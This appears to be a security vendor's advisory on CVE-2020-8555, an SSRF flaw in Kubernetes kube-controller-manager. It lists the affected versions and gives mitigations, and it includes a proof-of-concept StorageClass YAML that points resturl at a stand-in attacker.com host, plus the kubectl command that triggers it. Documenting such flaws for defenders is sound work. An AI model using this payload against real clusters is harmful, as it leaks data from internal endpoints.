Summary:
Kubernetes is an open source container orchestration system for automating application deployment, management and scaling. A security flaw was discovered and disclosed on June 1, 2020 in Kubernetes . A Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager. The vulnerability allows an attacker to users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master’s host network.This issue was assigned under CVE-2020-8555.
Description:
An attacker with permissions to to create a pod with certain built-in Volume types (GlusterFS, Quobyte, StorageFS, ScaleIO) or permissions to create a StorageClass creates a pod and attaches a volume to the pod. This volume can be one of the certain built-in Volume types like GlusterFS, Quobyte, StorageFS, ScaleIO etc. By using the volume attachment or storage class creation, the attacker makes kube-controller-manager k8s component to make GET or POST requests without an attacker-controlled request body from the host network that allows to leak some arbitrary information from unprotected endpoints.
Affected Products:
kube-controller-manager v1.18.0
kube-controller-manager v1.17.0 – v1.17.4
kube-controller-manager v1.16.0 – v1.16.8
kube-controller-manager < v1.15.11
Exploitation:
During a Volume creation /volumes was appended at the end of the user provided URL in resturl parameter, # trick was used in order to remove the end of this unwanted path.
YAML payload used for the half-blind SSRF vulnerability:
apiVersion: storage.k8s.io/v1 kind: StorageClass metadata: name: poc-ssrf provisioner: kubernetes.io/glusterfs parameters: resturl: "http://attacker.com:6666/#" --- apiVersion: v1 kind: PersistentVolumeClaim metadata: name: poc-ssrf spec: accessModes: - ReadWriteOnce volumeMode: Filesystem resources: requests: storage: 8Gi storageClassName: poc-ssrf
The kube controller manager handled the creation process and triggered the HTTP resulting request
kubectl create -f sc-poc.yaml
Received request from attacker point of view
Image Source: medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8
Please visit here for more details about the vulnerability.
Mitigation:
Vendor has officially released their official Advisory to patch the vulnerability. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster.
As per Advisory, “ Prior to upgrading, this vulnerability can also be mitigated by adding some endpoint protections on the master or restricting usage of the vulnerable volume types and restricting StorageClass write permissions through RBAC “.
Qualys customers can scan their network with QID(s)#48047 to detect the assets. Please continue to follow on Qualys Threat Protection for more coverage on these vulnerabilities.
References and Sources:
https://github.com/kubernetes/kubernetes/issues/91542
https://medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8